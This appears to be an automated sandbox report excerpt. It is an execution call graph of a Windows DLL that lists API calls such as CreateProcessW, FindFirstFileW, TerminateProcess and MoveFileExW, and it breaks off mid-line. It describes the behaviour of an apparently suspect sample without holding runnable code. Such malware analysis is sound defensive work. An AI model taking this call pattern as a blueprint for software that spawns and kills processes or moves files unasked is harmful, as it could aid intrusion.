                  • Opcode Fuzzy Hash: 48b098a2ba1b1b700a4fa5a18037902422f65498037332ec06771489e4415e0b
                  • Instruction Fuzzy Hash: 0EE0C236B81228B38A2033508C09A9F7E74EB51765B124420F92851B51CB715922C2E5

                  Execution Graph

                  Execution Coverage:2%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:1408
                  Total number of Limit Nodes:2
                  execution_graph 12603 6cdf30d9 12604 6cdf30e7 12603->12604 12605 6cdf30e2 12603->12605 12609 6cdf2fa3 12604->12609 12624 6cdf32bd 12605->12624 12610 6cdf2faf __FrameHandler3::FrameUnwindToState 12609->12610 12611 6cdf2fd8 dllmain_raw 12610->12611 12612 6cdf2fd3 12610->12612 12621 6cdf2fbe 12610->12621 12613 6cdf2ff2 dllmain_crt_dispatch 12611->12613 12611->12621 12628 6cdf1000 12612->12628 12613->12612 12613->12621 12616 6cdf3044 12617 6cdf304d dllmain_crt_dispatch 12616->12617 12616->12621 12619 6cdf3060 dllmain_raw 12617->12619 12617->12621 12618 6cdf1000 __DllMainCRTStartup@12 142 API calls 12620 6cdf302b 12618->12620 12619->12621 12633 6cdf2ef3 12620->12633 12623 6cdf3039 dllmain_raw 12623->12616 12625 6cdf32d3 12624->12625 12627 6cdf32dc 12625->12627 14339 6cdf3270 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12625->14339 12627->12604 12629 6cdf100d 12628->12629 12630 6cdf1007 12628->12630 12662 6cdf2808 12629->12662 12630->12616 12630->12618 12634 6cdf2eff __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 12633->12634 12635 6cdf2f9b 12634->12635 12636 6cdf2f30 12634->12636 12653 6cdf2f08 12634->12653 14126 6cdf3621 IsProcessorFeaturePresent 12635->14126 14101 6cdf3452 12636->14101 12639 6cdf2f35 14110 6cdf3314 12639->14110 12643 6cdf2fa2 __FrameHandler3::FrameUnwindToState 12645 6cdf2fd8 dllmain_raw 12643->12645 12646 6cdf2fd3 12643->12646 12659 6cdf2fbe 12643->12659 12644 6cdf2f3f __DllMainCRTStartup@12 14117 6cdf35f3 12644->14117 12647 6cdf2ff2 dllmain_crt_dispatch 12645->12647 12645->12659 12650 6cdf1000 __DllMainCRTStartup@12 142 API calls 12646->12650 12647->12646 12647->12659 12652 6cdf3013 12650->12652 12654 6cdf3044 12652->12654 12656 6cdf1000 __DllMainCRTStartup@12 142 API calls 12652->12656 12653->12623 12655 6cdf304d dllmain_crt_dispatch 12654->12655 12654->12659 12657 6cdf3060 dllmain_raw 12655->12657 12655->12659 12658 6cdf302b 12656->12658 12657->12659 12660 6cdf2ef3 __DllMainCRTStartup@12 161 API calls 12658->12660 12659->12623 12661 6cdf3039 dllmain_raw 12660->12661 12661->12654 12663 6cdf2833 __fread_nolock 12662->12663 12696 6cdf10ab 12663->12696 12665 6cdf284b __DllMainCRTStartup@12 12699 6cdf1024 12665->12699 12674 6cdf10ab __DllMainCRTStartup@12 59 API calls 12675 6cdf28dd __DllMainCRTStartup@12 12674->12675 12676 6cdf1024 __DllMainCRTStartup@12 58 API calls 12675->12676 12677 6cdf292d 12676->12677 12678 6cdfb786 ___std_exception_copy 17 API calls 12677->12678 12679 6cdf2933 12678->12679 12680 6cdf10ab __DllMainCRTStartup@12 59 API calls 12679->12680 12681 6cdf2946 __DllMainCRTStartup@12 12680->12681 12682 6cdf1024 __DllMainCRTStartup@12 58 API calls 12681->12682 12683 6cdf2991 12682->12683 12684 6cdfb786 ___std_exception_copy 17 API calls 12683->12684 12685 6cdf2997 12684->12685 12686 6cdf10ab __DllMainCRTStartup@12 59 API calls 12685->12686 12687 6cdf29ae __DllMainCRTStartup@12 12686->12687 12688 6cdf1024 __DllMainCRTStartup@12 58 API calls 12687->12688 12689 6cdf29f4 12688->12689 12690 6cdfb786 ___std_exception_copy 17 API calls 12689->12690 12691 6cdf29fa ExpandEnvironmentStringsW 12690->12691 12744 6cdf15a4 12691->12744 12695 6cdf1012 ExitProcess 12766 6cdf107d 12696->12766 12700 6cdf103d __DllMainCRTStartup@12 12699->12700 13006 6cdfa9ac 12700->13006 12703 6cdfb786 12704 6cdfe224 ___free_lconv_mon 17 API calls 12703->12704 12705 6cdf2897 GetEnvironmentVariableW 12704->12705 12706 6cdf1274 12705->12706 13187 6cdf41f0 12706->13187 12709 6cdf10ab __DllMainCRTStartup@12 59 API calls 12710 6cdf12c6 __DllMainCRTStartup@12 12709->12710 12711 6cdf130d GetProcAddress 12710->12711 12712 6cdfb786 ___std_exception_copy 17 API calls 12711->12712 12713 6cdf1325 12712->12713 12714 6cdf10ab __DllMainCRTStartup@12 59 API calls 12713->12714 12715 6cdf1337 __DllMainCRTStartup@12 12714->12715 12716 6cdf137e GetProcAddress 12715->12716 12717 6cdfb786 ___std_exception_copy 17 API calls 12716->12717 12718 6cdf1395 12717->12718 12719 6cdf10ab __DllMainCRTStartup@12 59 API calls 12718->12719 12720 6cdf13a7 __DllMainCRTStartup@12 12719->12720 12721 6cdf13ec GetProcAddress 12720->12721 12722 6cdfb786 ___std_exception_copy 17 API calls 12721->12722 12723 6cdf1403 12722->12723 12724 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12723->12724 12725 6cdf1416 12724->12725 12726 6cdf141e 12725->12726 12727 6cdf1448 __fread_nolock 12726->12727 12728 6cdf10ab __DllMainCRTStartup@12 59 API calls 12727->12728 12729 6cdf145d __DllMainCRTStartup@12 12728->12729 12730 6cdf1024 __DllMainCRTStartup@12 58 API calls 12729->12730 12731 6cdf14a0 12730->12731 12732 6cdfb786 ___std_exception_copy 17 API calls 12731->12732 12733 6cdf14a6 __fread_nolock 12732->12733 12734 6cdf10ab __DllMainCRTStartup@12 59 API calls 12733->12734 12735 6cdf14e9 __DllMainCRTStartup@12 12734->12735 12736 6cdf1024 __DllMainCRTStartup@12 58 API calls 12735->12736 12737 6cdf152f 12736->12737 12738 6cdfb786 ___std_exception_copy 17 API calls 12737->12738 12739 6cdf1535 12738->12739 12740 6cdf1024 __DllMainCRTStartup@12 58 API calls 12739->12740 12741 6cdf1558 Sleep CreateProcessW 12740->12741 12742 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12741->12742 12743 6cdf159d Sleep Sleep 12742->12743 12743->12674 12745 6cdf1024 __DllMainCRTStartup@12 58 API calls 12744->12745 12746 6cdf164e FindFirstFileW 12745->12746 12752 6cdf166a 12746->12752 12747 6cdf1770 12748 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12747->12748 12749 6cdf178d 12748->12749 12759 6cdf2d25 12749->12759 12750 6cdf174e FindNextFileW 12750->12752 12751 6cdf1024 __DllMainCRTStartup@12 58 API calls 12751->12752 12752->12747 12752->12750 12752->12751 12753 6cdf15a4 __DllMainCRTStartup@12 126 API calls 12752->12753 12754 6cdf16ef 12752->12754 12753->12752 12755 6cdf1024 __DllMainCRTStartup@12 58 API calls 12754->12755 12756 6cdf170a TerminateProcess CloseHandle CloseHandle 12755->12756 13189 6cdf1795 12756->13189 12760 6cdf2d2e IsProcessorFeaturePresent 12759->12760 12761 6cdf2d2d 12759->12761 12763 6cdf3169 12760->12763 12761->12695 14100 6cdf312c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12763->14100 12765 6cdf324c 12765->12695 12767 6cdf1094 __DllMainCRTStartup@12 12766->12767 12770 6cdfa96b 12767->12770 12771 6cdfa97f __wsopen_s 12770->12771 12776 6cdf677e 12771->12776 12777 6cdf67ad 12776->12777 12778 6cdf678a 12776->12778 12782 6cdf67d4 12777->12782 12802 6cdf6487 12777->12802 12790 6cdfbc5d 12778->12790 12781 6cdfbc5d __wsopen_s 33 API calls 12783 6cdf67a5 12781->12783 12782->12781 12782->12783 12784 6cdf5f8b 12783->12784 12785 6cdf5f97 12784->12785 12786 6cdf5fae 12785->12786 12952 6cdf63d4 12785->12952 12788 6cdf109e 12786->12788 12789 6cdf63d4 __wsopen_s 50 API calls 12786->12789 12788->12665 12789->12788 12791 6cdfbc6d 12790->12791 12792 6cdfbc74 12790->12792 12813 6cdf638e GetLastError 12791->12813 12794 6cdfbc82 12792->12794 12817 6cdfbab5 12792->12817 12796 6cdfbc91 mydllmain 12794->12796 12798 6cdfbc9b 12796->12798 12797 6cdfbca9 12797->12796 12799 6cdfbcd4 12797->12799 12798->12783 12820 6cdfbd07 IsProcessorFeaturePresent 12799->12820 12801 6cdfbcd9 12803 6cdf64d6 12802->12803 12804 6cdf64b3 12802->12804 12803->12804 12808 6cdf64de __DllMainCRTStartup@12 12803->12808 12805 6cdfbc5d __wsopen_s 33 API calls 12804->12805 12806 6cdf64cb 12805->12806 12807 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12806->12807 12809 6cdf65f9 12807->12809 12852 6cdf8958 12808->12852 12809->12782 12814 6cdf63a7 12813->12814 12824 6cdfd479 12814->12824 12818 6cdfbad9 12817->12818 12819 6cdfbac0 GetLastError SetLastError 12817->12819 12818->12797 12819->12797 12821 6cdfbd13 12820->12821 12846 6cdfbade 12821->12846 12825 6cdfd48c 12824->12825 12826 6cdfd492 12824->12826 12827 6cdff9e2 _unexpected 7 API calls 12825->12827 12828 6cdffa21 _unexpected 7 API calls 12826->12828 12845 6cdf63bf SetLastError 12826->12845 12827->12826 12829 6cdfd4ac 12828->12829 12830 6cdff70a _unexpected 17 API calls 12829->12830 12829->12845 12831 6cdfd4bc 12830->12831 12832 6cdfd4d9 12831->12832 12833 6cdfd4c4 12831->12833 12834 6cdffa21 _unexpected 7 API calls 12832->12834 12835 6cdffa21 _unexpected 7 API calls 12833->12835 12836 6cdfd4e5 12834->12836 12837 6cdfd4d0 12835->12837 12838 6cdfd4e9 12836->12838 12839 6cdfd4f8 12836->12839 12840 6cdfe224 ___free_lconv_mon 17 API calls 12837->12840 12841 6cdffa21 _unexpected 7 API calls 12838->12841 12842 6cdfd079 _unexpected 17 API calls 12839->12842 12840->12845 12841->12837 12843 6cdfd503 12842->12843 12844 6cdfe224 ___free_lconv_mon 17 API calls 12843->12844 12844->12845 12845->12792 12847 6cdfbafa __fread_nolock CallUnexpected 12846->12847 12848 6cdfbb26 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12847->12848 12849 6cdfbbf7 CallUnexpected 12848->12849 12850 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12849->12850 12851 6cdfbc15 GetCurrentProcess TerminateProcess 12850->12851 12851->12801 12869 6cdfa60e 12852->12869 12854 6cdf8972 __DllMainCRTStartup@12 12855 6cdf897d 12854->12855 12856 6cdf655f 12854->12856 12862 6cdf8a81 12854->12862 12873 6cdfa560 12854->12873 12880 6cdf85b6 12854->12880 12883 6cdf8fd5 12854->12883 12917 6cdf95fa 12854->12917 12857 6cdfbc5d __wsopen_s 33 API calls 12855->12857 12866 6cdf836c 12856->12866 12857->12856 12863 6cdfbc5d __wsopen_s 33 API calls 12862->12863 12864 6cdf8a9b 12863->12864 12865 6cdfbc5d __wsopen_s 33 API calls 12864->12865 12865->12856 12946 6cdfe224 12866->12946 12870 6cdfa619 12869->12870 12872 6cdfa632 12869->12872 12871 6cdfbc5d __wsopen_s 33 API calls 12870->12871 12871->12872 12872->12854 12874 6cdf63d4 __wsopen_s 50 API calls 12873->12874 12875 6cdfa570 12874->12875 12876 6cdfe5ab __wsopen_s 50 API calls 12875->12876 12877 6cdfa58d 12876->12877 12878 6cdfe609 __wsopen_s 50 API calls 12877->12878 12879 6cdfa59a 12878->12879 12879->12854 12881 6cdf6ab9 __DllMainCRTStartup@12 50 API calls 12880->12881 12882 6cdf85f1 12881->12882 12882->12854 12884 6cdf8fdc 12883->12884 12885 6cdf8ff3 12883->12885 12887 6cdf967f 12884->12887 12888 6cdf961f 12884->12888 12898 6cdf9032 12884->12898 12886 6cdfbc5d __wsopen_s 33 API calls 12885->12886 12885->12898 12889 6cdf9027 12886->12889 12890 6cdf96b8 12887->12890 12891 6cdf9684 12887->12891 12892 6cdf96a5 12888->12892 12893 6cdf9625 12888->12893 12889->12854 12894 6cdf96bd 12890->12894 12895 6cdf96d5 12890->12895 12896 6cdf9686 12891->12896 12897 6cdf96b1 12891->12897 12900 6cdf75d8 __DllMainCRTStartup@12 34 API calls 12892->12900 12904 6cdf9676 12893->12904 12905 6cdf962a 12893->12905 12894->12892 12894->12904 12916 6cdf9650 __DllMainCRTStartup@12 12894->12916 12902 6cdfa39b __DllMainCRTStartup@12 34 API calls 12895->12902 12899 6cdf9639 12896->12899 12907 6cdf9695 12896->12907 12901 6cdfa361 __DllMainCRTStartup@12 34 API calls 12897->12901 12898->12854 12903 6cdf9e67 __DllMainCRTStartup@12 57 API calls 12899->12903 12915 6cdf96de __DllMainCRTStartup@12 12899->12915 12900->12916 12901->12916 12902->12916 12903->12916 12906 6cdf78f7 __DllMainCRTStartup@12 34 API calls 12904->12906 12904->12915 12905->12899 12908 6cdf9663 12905->12908 12905->12916 12906->12916 12907->12892 12909 6cdf9699 12907->12909 12910 6cdfa19f __DllMainCRTStartup@12 52 API calls 12908->12910 12908->12915 12912 6cdfa2dc __DllMainCRTStartup@12 33 API calls 12909->12912 12909->12915 12910->12916 12911 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12913 6cdf9957 12911->12913 12912->12916 12913->12854 12914 6cdff193 __DllMainCRTStartup@12 52 API calls 12914->12916 12915->12911 12916->12914 12916->12915 12918 6cdf967f 12917->12918 12919 6cdf961f 12917->12919 12920 6cdf96b8 12918->12920 12921 6cdf9684 12918->12921 12922 6cdf96a5 12919->12922 12923 6cdf9625 12919->12923 12924 6cdf96bd 12920->12924 12925 6cdf96d5 12920->12925 12926 6cdf9686 12921->12926 12927 6cdf96b1 12921->12927 12931 6cdf75d8 __DllMainCRTStartup@12 34 API calls 12922->12931 12933 6cdf9676 12923->12933 12934 6cdf962a 12923->12934 12924->12922 12924->12933 12943 6cdf9650 __DllMainCRTStartup@12 12924->12943 12930 6cdfa39b __DllMainCRTStartup@12 34 API calls 12925->12930 12929 6cdf9639 12926->12929 12936 6cdf9695 12926->12936 12928 6cdfa361 __DllMainCRTStartup@12 34 API calls 12927->12928 12928->12943 12932 6cdf9e67 __DllMainCRTStartup@12 57 API calls 12929->12932 12945 6cdf96de __DllMainCRTStartup@12 12929->12945 12930->12943 12931->12943 12932->12943 12935 6cdf78f7 __DllMainCRTStartup@12 34 API calls 12933->12935 12933->12945 12934->12929 12937 6cdf9663 12934->12937 12934->12943 12935->12943 12936->12922 12938 6cdf9699 12936->12938 12939 6cdfa19f __DllMainCRTStartup@12 52 API calls 12937->12939 12937->12945 12941 6cdfa2dc __DllMainCRTStartup@12 33 API calls 12938->12941 12938->12945 12939->12943 12940 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12942 6cdf9957 12940->12942 12941->12943 12942->12854 12944 6cdff193 __DllMainCRTStartup@12 52 API calls 12943->12944 12943->12945 12944->12943 12945->12940 12947 6cdfe22f HeapFree 12946->12947 12948 6cdf837c 12946->12948 12947->12948 12949 6cdfe244 GetLastError 12947->12949 12948->12806 12950 6cdfe251 __dosmaperr 12949->12950 12951 6cdfe211 __dosmaperr 15 API calls 12950->12951 12951->12948 12953 6cdf63de 12952->12953 12954 6cdf63e7 12952->12954 12955 6cdf638e __wsopen_s 19 API calls 12953->12955 12954->12786 12956 6cdf63e3 12955->12956 12956->12954 12959 6cdfcb25 12956->12959 12970 6ce02d2d 12959->12970 12962 6cdfcb35 12963 6cdfcb3f IsProcessorFeaturePresent 12962->12963 12969 6cdfcb5e 12962->12969 12965 6cdfcb4b 12963->12965 12967 6cdfbade CallUnexpected 8 API calls 12965->12967 12967->12969 13003 6cdfc2aa 12969->13003 12971 6ce02c5b CallUnexpected EnterCriticalSection LeaveCriticalSection 12970->12971 12972 6cdfcb2a 12971->12972 12972->12962 12973 6ce02d72 12972->12973 12977 6ce02d7e __FrameHandler3::FrameUnwindToState 12973->12977 12974 6ce02de0 CallUnexpected 12981 6ce015d1 CallUnexpected EnterCriticalSection 12974->12981 12982 6ce02e16 CallUnexpected 12974->12982 12975 6cdfd3c8 __dosmaperr 17 API calls 12979 6ce02daf CallUnexpected 12975->12979 12976 6ce02dce 12978 6cdfe211 __dosmaperr 17 API calls 12976->12978 12977->12974 12977->12975 12977->12976 12977->12979 12980 6ce02dd3 12978->12980 12979->12974 12979->12976 12989 6ce02db8 12979->12989 12983 6cdfbcda __wsopen_s 48 API calls 12980->12983 12981->12982 12985 6ce02f50 12982->12985 12986 6ce02e53 12982->12986 13001 6ce02e81 12982->13001 12983->12989 12984 6ce02efc CallUnexpected LeaveCriticalSection 12987 6ce02ec8 12984->12987 12988 6ce02f5b 12985->12988 12990 6ce01619 CallUnexpected LeaveCriticalSection 12985->12990 12994 6cdfd277 _unexpected 48 API calls 12986->12994 12986->13001 12987->12989 12992 6ce02ed1 12987->12992 12993 6ce02f0c mydllmain 12987->12993 12991 6cdfc2aa CallUnexpected 29 API calls 12988->12991 12989->12962 12990->12988 12995 6ce02f63 12991->12995 12996 6cdfd277 _unexpected 48 API calls 12992->12996 13000 6ce02ee7 12993->13000 12997 6ce02e76 12994->12997 12998 6ce02ed6 mydllmain 12996->12998 12999 6cdfd277 _unexpected 48 API calls 12997->12999 12998->13000 12999->13001 13000->12989 13002 6cdfd277 _unexpected 48 API calls 13000->13002 13001->12984 13002->12989 13004 6cdfc0e7 CallUnexpected 29 API calls 13003->13004 13005 6cdfc2bb 13004->13005 13007 6cdfa9c0 __wsopen_s 13006->13007 13012 6cdf681d 13007->13012 13010 6cdf5f8b __wsopen_s 50 API calls 13011 6cdf1047 13010->13011 13011->12703 13013 6cdf684c 13012->13013 13014 6cdf6829 13012->13014 13019 6cdf6873 13013->13019 13020 6cdf65fb 13013->13020 13015 6cdfbc5d __wsopen_s 33 API calls 13014->13015 13018 6cdf6844 13015->13018 13016 6cdfbc5d __wsopen_s 33 API calls 13016->13018 13018->13010 13019->13016 13019->13018 13021 6cdf664a 13020->13021 13022 6cdf6627 13020->13022 13021->13022 13025 6cdf6652 __DllMainCRTStartup@12 13021->13025 13023 6cdfbc5d __wsopen_s 33 API calls 13022->13023 13030 6cdf663f 13023->13030 13024 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13026 6cdf677c 13024->13026 13031 6cdf8c3c 13025->13031 13026->13019 13029 6cdf836c __DllMainCRTStartup@12 17 API calls 13029->13030 13030->13024 13032 6cdfa60e __DllMainCRTStartup@12 33 API calls 13031->13032 13036 6cdf8c51 __DllMainCRTStartup@12 13032->13036 13033 6cdf66d3 13033->13029 13034 6cdf8c5c 13035 6cdfbc5d __wsopen_s 33 API calls 13034->13035 13035->13033 13036->13033 13036->13034 13040 6cdf862e 13036->13040 13043 6cdf912e 13036->13043 13084 6cdf9959 13036->13084 13120 6cdf6cc8 13040->13120 13042 6cdf866b 13042->13036 13044 6cdf913c 13043->13044 13045 6cdf9154 13043->13045 13046 6cdf9987 13044->13046 13047 6cdf99f1 13044->13047 13049 6cdf9195 13044->13049 13048 6cdfbc5d __wsopen_s 33 API calls 13045->13048 13045->13049 13050 6cdf998d 13046->13050 13051 6cdf9a19 13046->13051 13053 6cdf99f6 13047->13053 13054 6cdf9a30 13047->13054 13052 6cdf9189 13048->13052 13049->13036 13055 6cdf99be 13050->13055 13056 6cdf9992 13050->13056 13157 6cdf7765 13051->13157 13052->13036 13057 6cdf99f8 13053->13057 13058 6cdf9a27 13053->13058 13059 6cdf9a4f 13054->13059 13060 6cdf9a35 13054->13060 13064 6cdf9998 13055->13064 13069 6cdf99e6 13055->13069 13061 6cdf9a46 13056->13061 13056->13064 13067 6cdf99a0 13057->13067 13073 6cdf9a07 13057->13073 13164 6cdfa37e 13058->13164 13172 6cdfa3b1 13059->13172 13060->13061 13065 6cdf9a3a 13060->13065 13168 6cdfa439 13061->13168 13064->13067 13071 6cdf99cb 13064->13071 13080 6cdf99b9 __DllMainCRTStartup@12 13064->13080 13065->13051 13065->13069 13082 6cdf9a5a __DllMainCRTStartup@12 13067->13082 13130 6cdf9ff8 13067->13130 13069->13082 13146 6cdf7a84 13069->13146 13071->13082 13140 6cdfa234 13071->13140 13073->13051 13075 6cdf9a0b 13073->13075 13075->13082 13153 6cdfa2dc 13075->13153 13076 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13078 6cdf9d4b 13076->13078 13078->13036 13079 6cdfa560 __wsopen_s 50 API calls 13083 6cdf9c3a 13079->13083 13080->13079 13080->13082 13080->13083 13082->13076 13083->13082 13175 6cdff2fd 13083->13175 13085 6cdf9987 13084->13085 13086 6cdf99f1 13084->13086 13087 6cdf998d 13085->13087 13088 6cdf9a19 13085->13088 13089 6cdf99f6 13086->13089 13090 6cdf9a30 13086->13090 13091 6cdf99be 13087->13091 13092 6cdf9992 13087->13092 13099 6cdf7765 __DllMainCRTStartup@12 34 API calls 13088->13099 13093 6cdf99f8 13089->13093 13094 6cdf9a27 13089->13094 13095 6cdf9a4f 13090->13095 13096 6cdf9a35 13090->13096 13101 6cdf9998 13091->13101 13106 6cdf99e6 13091->13106 13097 6cdf9a46 13092->13097 13092->13101 13102 6cdf99a0 13093->13102 13109 6cdf9a07 13093->13109 13100 6cdfa37e __DllMainCRTStartup@12 34 API calls 13094->13100 13098 6cdfa3b1 __DllMainCRTStartup@12 34 API calls 13095->13098 13096->13097 13103 6cdf9a3a 13096->13103 13104 6cdfa439 __DllMainCRTStartup@12 50 API calls 13097->13104 13116 6cdf99b9 __DllMainCRTStartup@12 13098->13116 13099->13116 13100->13116 13101->13102 13107 6cdf99cb 13101->13107 13101->13116 13105 6cdf9ff8 __DllMainCRTStartup@12 57 API calls 13102->13105 13118 6cdf9a5a __DllMainCRTStartup@12 13102->13118 13103->13088 13103->13106 13104->13116 13105->13116 13108 6cdf7a84 __DllMainCRTStartup@12 34 API calls 13106->13108 13106->13118 13110 6cdfa234 __DllMainCRTStartup@12 51 API calls 13107->13110 13107->13118 13108->13116 13109->13088 13111 6cdf9a0b 13109->13111 13110->13116 13113 6cdfa2dc __DllMainCRTStartup@12 33 API calls 13111->13113 13111->13118 13112 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13114 6cdf9d4b 13112->13114 13113->13116 13114->13036 13115 6cdfa560 __wsopen_s 50 API calls 13119 6cdf9c3a 13115->13119 13116->13115 13116->13118 13116->13119 13117 6cdff2fd __wsopen_s 51 API calls 13117->13119 13118->13112 13119->13117 13119->13118 13121 6cdfa5bb __DllMainCRTStartup@12 50 API calls 13120->13121 13122 6cdf6cde 13121->13122 13123 6cdf6cf3 13122->13123 13126 6cdf6d26 13122->13126 13129 6cdf6d0e __DllMainCRTStartup@12 13122->13129 13124 6cdfbc5d __wsopen_s 33 API calls 13123->13124 13124->13129 13125 6cdf7025 13127 6cdfa52b __DllMainCRTStartup@12 50 API calls 13125->13127 13126->13125 13128 6cdfa52b __DllMainCRTStartup@12 50 API calls 13126->13128 13127->13129 13128->13125 13129->13042 13131 6cdfa019 13130->13131 13132 6cdf68e8 __DllMainCRTStartup@12 18 API calls 13131->13132 13133 6cdfa05b __DllMainCRTStartup@12 13132->13133 13134 6cdff012 __DllMainCRTStartup@12 56 API calls 13133->13134 13135 6cdfa0ee 13134->13135 13136 6cdfa560 __wsopen_s 50 API calls 13135->13136 13137 6cdfa111 __DllMainCRTStartup@12 13135->13137 13136->13137 13138 6cdfa560 __wsopen_s 50 API calls 13137->13138 13139 6cdfa14d __DllMainCRTStartup@12 13137->13139 13138->13139 13139->13080 13139->13139 13142 6cdfa261 __DllMainCRTStartup@12 13140->13142 13141 6cdfa27d 13144 6cdff2fd __wsopen_s 51 API calls 13141->13144 13142->13141 13143 6cdfa560 __wsopen_s 50 API calls 13142->13143 13145 6cdfa29e 13142->13145 13143->13141 13144->13145 13145->13080 13147 6cdf7a99 __DllMainCRTStartup@12 13146->13147 13148 6cdf7abb 13147->13148 13150 6cdf7ae2 13147->13150 13149 6cdfbc5d __wsopen_s 33 API calls 13148->13149 13152 6cdf7ad8 __DllMainCRTStartup@12 13149->13152 13151 6cdf6969 __DllMainCRTStartup@12 18 API calls 13150->13151 13150->13152 13151->13152 13152->13080 13154 6cdfa2f2 __DllMainCRTStartup@12 13153->13154 13155 6cdfbc5d __wsopen_s 33 API calls 13154->13155 13156 6cdfa313 13154->13156 13155->13156 13156->13080 13158 6cdf777a __DllMainCRTStartup@12 13157->13158 13159 6cdf77c3 13158->13159 13160 6cdf779c 13158->13160 13162 6cdf77b9 __DllMainCRTStartup@12 13159->13162 13163 6cdf6969 __DllMainCRTStartup@12 18 API calls 13159->13163 13161 6cdfbc5d __wsopen_s 33 API calls 13160->13161 13161->13162 13162->13080 13163->13162 13165 6cdfa38a 13164->13165 13166 6cdf7446 __DllMainCRTStartup@12 34 API calls 13165->13166 13167 6cdfa39a 13166->13167 13167->13080 13169 6cdfa456 __DllMainCRTStartup@12 13168->13169 13170 6cdfa4ad __DllMainCRTStartup@12 50 API calls 13169->13170 13171 6cdfa474 __DllMainCRTStartup@12 13169->13171 13170->13171 13171->13080 13173 6cdf7a84 __DllMainCRTStartup@12 34 API calls 13172->13173 13174 6cdfa3c6 13173->13174 13174->13080 13176 6cdff311 13175->13176 13185 6cdff321 13175->13185 13177 6cdff346 13176->13177 13178 6cdfa560 __wsopen_s 50 API calls 13176->13178 13176->13185 13179 6cdff37a 13177->13179 13180 6cdff357 13177->13180 13178->13177 13182 6cdff3f6 13179->13182 13183 6cdff3a2 13179->13183 13179->13185 13181 6ce058ac __wsopen_s 5 API calls 13180->13181 13181->13185 13184 6ce0293d __fread_nolock MultiByteToWideChar 13182->13184 13183->13185 13186 6ce0293d __fread_nolock MultiByteToWideChar 13183->13186 13184->13185 13185->13083 13186->13185 13188 6cdf12a3 GetModuleHandleW 13187->13188 13188->12709 13231 6cdfaf9b 13189->13231 13195 6cdf190b __DllMainCRTStartup@12 13198 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13195->13198 13200 6cdf174d 13198->13200 13200->12750 13201 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13202 6cdf1851 ___std_exception_copy 13201->13202 13259 6cdfb97a 13202->13259 13204 6cdf1876 __DllMainCRTStartup@12 13262 6cdfad4d 13204->13262 13207 6cdfb786 ___std_exception_copy 17 API calls 13208 6cdf18b5 __DllMainCRTStartup@12 13207->13208 13208->13195 13209 6cdfad4d __DllMainCRTStartup@12 53 API calls 13208->13209 13210 6cdf18f6 13209->13210 13211 6cdfb786 ___std_exception_copy 17 API calls 13210->13211 13212 6cdf18fe 13211->13212 13212->13195 13213 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13212->13213 13214 6cdf1924 13213->13214 13215 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13214->13215 13219 6cdf1931 ___std_exception_copy __DllMainCRTStartup@12 13215->13219 13216 6cdfad4d 53 API calls __DllMainCRTStartup@12 13216->13219 13217 6cdfb786 17 API calls ___std_exception_copy 13217->13219 13219->13195 13219->13216 13219->13217 13220 6cdfb107 __DllMainCRTStartup@12 80 API calls 13219->13220 13221 6cdf1a5b 13219->13221 13268 6cdfb71f 13219->13268 13220->13219 13222 6cdfb107 __DllMainCRTStartup@12 80 API calls 13221->13222 13223 6cdf1a63 13222->13223 13224 6cdf1024 __DllMainCRTStartup@12 58 API calls 13223->13224 13225 6cdf1a7a 13224->13225 13274 6cdfb759 MoveFileExW 13225->13274 13227 6cdf1a84 __DllMainCRTStartup@12 13279 6cdf22df 13227->13279 13229 6cdf1b1b __DllMainCRTStartup@12 13287 6cdf1c39 CoInitialize CoCreateInstance 13229->13287 13232 6cdfafb9 13231->13232 13233 6cdfafa8 13231->13233 13353 6cdfaee5 13232->13353 13348 6cdfe211 13233->13348 13239 6cdfe211 __dosmaperr 17 API calls 13240 6cdf1812 13239->13240 13240->13195 13241 6cdfb420 13240->13241 13242 6cdfb433 __wsopen_s 13241->13242 13488 6cdfb1b1 13242->13488 13245 6cdf5f8b __wsopen_s 50 API calls 13246 6cdf182d 13245->13246 13247 6cdf63fc 13246->13247 13248 6cdf640f __wsopen_s 13247->13248 13556 6cdf5cf0 13248->13556 13251 6cdf5f8b __wsopen_s 50 API calls 13252 6cdf1835 13251->13252 13253 6cdfb107 13252->13253 13254 6cdfb11a __wsopen_s 13253->13254 13610 6cdfafe2 13254->13610 13256 6cdfb126 13257 6cdf5f8b __wsopen_s 50 API calls 13256->13257 13258 6cdf1842 13257->13258 13258->13201 13659 6cdfb997 13259->13659 13263 6cdfad61 __DllMainCRTStartup@12 __wsopen_s 13262->13263 13810 6cdfaa2e 13263->13810 13265 6cdfad82 13266 6cdf5f8b __wsopen_s 50 API calls 13265->13266 13267 6cdf18aa 13266->13267 13267->13207 13269 6cdfb732 __wsopen_s 13268->13269 13912 6cdfb501 13269->13912 13271 6cdfb747 13272 6cdf5f8b __wsopen_s 50 API calls 13271->13272 13273 6cdfb754 13272->13273 13273->13219 13275 6cdfb782 13274->13275 13276 6cdfb770 GetLastError 13274->13276 13275->13227 13277 6cdfe1b7 __dosmaperr 17 API calls 13276->13277 13278 6cdfb77c 13277->13278 13278->13227 13280 6cdf2304 13279->13280 13281 6cdf235c 13280->13281 13284 